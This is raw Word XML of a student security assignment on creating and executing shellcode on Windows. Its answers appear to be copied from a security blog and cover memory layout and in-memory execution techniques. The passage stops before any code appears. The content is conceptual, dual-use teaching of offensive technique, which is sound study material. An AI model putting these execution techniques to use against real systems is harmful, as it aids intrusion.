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9DC" w:rsidRPr="00F07469" w:rsidRDefault="00ED43A8" w:rsidP="00ED43A8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Assignment 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00066ED9" w:rsidRPr="00F07469" w:rsidRDefault="00ED43A8" w:rsidP="00066ED9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Q1:-</w:t>
      </w:r>
      <w:r w:rsidR="00066ED9" w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00066ED9" w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00066ED9" w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00066ED9" w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> to exploit windows OS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer:-- </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">In computer security, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>shellcoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in its most literal sense, means writing code that will return a remote shell when executed. The meaning of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> has </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>evolved;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> it now represents any byte code that will be inserted into an exploit to accomplish a desired task.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00066ED9" w:rsidRPr="00F07469" w:rsidRDefault="00066ED9" w:rsidP="00066ED9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Execute the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00254458" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="135" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">explaining basic concepts of In-Memory code execution this blog post aims to improve everyone’s ability to do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.</w:t>
      </w:r>
      <w:r w:rsidRPr="00254458">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00254458">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> essence the following four execution techniques will be covered:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00254458" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="532"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254458">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Dynamic Allocation of Memory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00254458" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="532"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254458">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Function Pointer Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00254458" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="532"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254458">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.TEXT-Segment Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00254458" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="532"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254458">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>RWX-Hunter Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254458">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Especially the first two techniques are very widely known and most should be familiar with these, however, the latter two might be new to some. </w:t>
      </w:r>
      <w:r w:rsidRPr="00254458">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Each of these techniques describes a way of executing code in a different memory </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00254458">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>section,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00254458">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> therefore it is necessary to review a processes memory layout as a first step.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>A Processes Memory Layout</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> :- </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>The first concept that needs to be understood is that the entire virtual memory space is split into two relevant parts: Virtual memory space reserved for user processes (user space) and virtual memory space reserved for system processes (kernel space), as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73FDD8BF" wp14:editId="6C711557">
            <wp:extent cx="4133850" cy="5132796"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="https://www.contextis.com/media/images/content/Windows_Shellcode_Execution_Techniqu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ntextis.com/media/images/content/Windows_Shellcode_Execution_Technique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5132796"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t>The first takeaway from this is that each process gets its own, private virtual address space, where the “kernel space” is kind of a “shared environment”, meaning each kernel process can read/write to virtual memory anywhere it wants to. Please note the latter is only true for environments without Virtualization-based Security (VBS), but that’s a different topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t>The representation above shows what the global virtual address space looks like, let’s break this down for a single process:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AC01DDD" wp14:editId="47469102">
            <wp:extent cx="2219325" cy="3769589"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="6" name="Picture 6" descr="https://www.contextis.com/media/images/content/Windows_Shellcode_Execution_Techniq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ntextis.com/media/images/content/Windows_Shellcode_Execution_Techniques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3769589"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t>A single processes virtual memory space consists of multiple sections that are placed somewhere within the available space boundaries by Address Space Layout Randomization (ASLR). Most of these sections should be familiar, but to keep everyone on the same page, here is a quick rundown of these sections:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>.TEXT Segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t>: This is where the executable process image is placed. In this area you will find the main entry of the executable, where the execution flow starts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t> .DATA Segment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t> The .DATA section contains globally initialized or static variables. Any variable that is not bound to a specific function is stored here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>.BSS Segment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t> Similar to the .DATA segment, this section holds any uninitialized global or static variables. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>HEAP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> This is where all your dynamic local variables are stored. Every time you create an object for which the space that is needed is determined at run time, the required address space is dynamically assigned within the HEAP (usually using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>alloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>) or similar system calls).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5BC7" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>STACK:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t> The stack is the place every static local variable is assigned to. If you initialize a variable locally within a function, this variable will be placed on the STACK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5BC7" w:rsidRPr="00F07469" w:rsidRDefault="006B5BC7" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B5BC7" w:rsidRPr="00F07469" w:rsidRDefault="006B5BC7" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dynamically Allocate Memory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">After defining the basics, let’s have a look on what is needed to execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> within your process memory space. In order to execute your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> you need to complete the following three checks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You need virtual address space that is marked as executable (otherwise DEP will throw an exception)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">You need to get your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> into that address space</w:t>
      </w:r>
    </w:p>
